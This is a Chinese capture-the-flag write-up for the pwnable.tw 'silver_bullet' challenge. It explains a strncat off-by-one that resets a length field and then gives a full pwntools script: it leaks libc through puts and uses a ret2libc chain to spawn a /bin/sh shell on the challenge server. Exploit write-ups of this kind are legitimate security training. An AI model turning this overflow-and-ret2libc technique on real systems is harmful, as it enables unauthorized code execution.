码迷,mamicode.com
首页 > 其他好文 > 详细

pwnable.tw silver_bullet

时间:2019-03-30 20:19:18      阅读:226      评论:0      收藏:0      [点我收藏+]

标签:line   fir   read   print   col   RoCE   添加   bullet   rac   

产生漏洞的原因

int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t new_len; // [esp+30h] [ebp-4h]

  new_len = 0;
  memset(&s, 0, 0x30u);
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 12) > 47u )           // len>47
    return puts("You can‘t power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 48 - *((_DWORD *)dest + 12));
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat会在dest结尾添加\0结束符,而记录字符串长度的位置正好位于s+0x30的位置,
                                                // s+0x30在strncat添加字符串长度为0x30时会被覆盖为0
  new_len = strlen(&s) + *((_DWORD *)dest + 12);// s+0x30被覆盖为0后new_len变为附加字符串的长度
  printf("Your new power is : %u\n", new_len);
  *((_DWORD *)dest + 12) = new_len;
  return puts("Enjoy it !");
}

脚本

from pwn import *

context.log_level=‘DEBUG‘


r=remote(‘chall.pwnable.tw‘,10103)
file=ELF(‘./silver_bullet‘)
libc=ELF(‘./libc_32.so.6‘)
‘‘‘
r=process(‘./silver_bullet‘)
file=ELF(‘./silver_bullet‘)
libc=ELF(‘/lib/i386-linux-gnu/libc-2.28.so‘)
‘‘‘

#trigger stack overflow
r.recvuntil(‘Your choice :‘)
r.sendline(‘1‘)
r.recvuntil(‘Give me your description of bullet :‘)
r.send(‘a‘*47)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
r.send(‘b‘)
#gdb.attach(r)

#leak libc
r.recvuntil(‘Your choice :‘)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
start=0x080484F0
payload=‘\xff‘*3+p32(0xdeadbeaf)+p32(file.plt[‘puts‘])+p32(start)+p32(file.got[‘puts‘])
payload+=(47-len(payload))*‘a‘
r.send(payload)
r.recvuntil(‘Your choice :‘)
r.sendline(‘3‘)
r.recvuntil(‘Oh ! You win !!\n‘)
libc_base=u32(r.recv(4))-libc.sym[‘puts‘]
success(‘libc_base:‘+hex(libc_base))
sys_addr=libc_base+libc.sym[‘system‘]
binsh_addr=libc_base+libc.search(‘/bin/sh‘).next()
success(‘binsh_addr‘+hex(binsh_addr))
#gdb.attach(r)

#trigger stack overflow again
r.recvuntil(‘Your choice :‘)
r.sendline(‘1‘)
r.recvuntil(‘Give me your description of bullet :‘)
r.send(‘a‘*47)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
r.send(‘b‘)

#trigger system(‘/bin/sh‘) call
r.recvuntil(‘Your choice :‘)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
payload1=‘\xff‘*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
payload1+=(47-len(payload))*‘a‘
r.send(payload1)
r.recvuntil(‘Your choice :‘)
r.sendline(‘3‘)
r.recvuntil(‘Oh ! You win !!\n‘)
r.interactive()



 

pwnable.tw silver_bullet

标签:line   fir   read   print   col   RoCE   添加   bullet   rac   

原文地址:https://www.cnblogs.com/snip3r/p/10628682.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!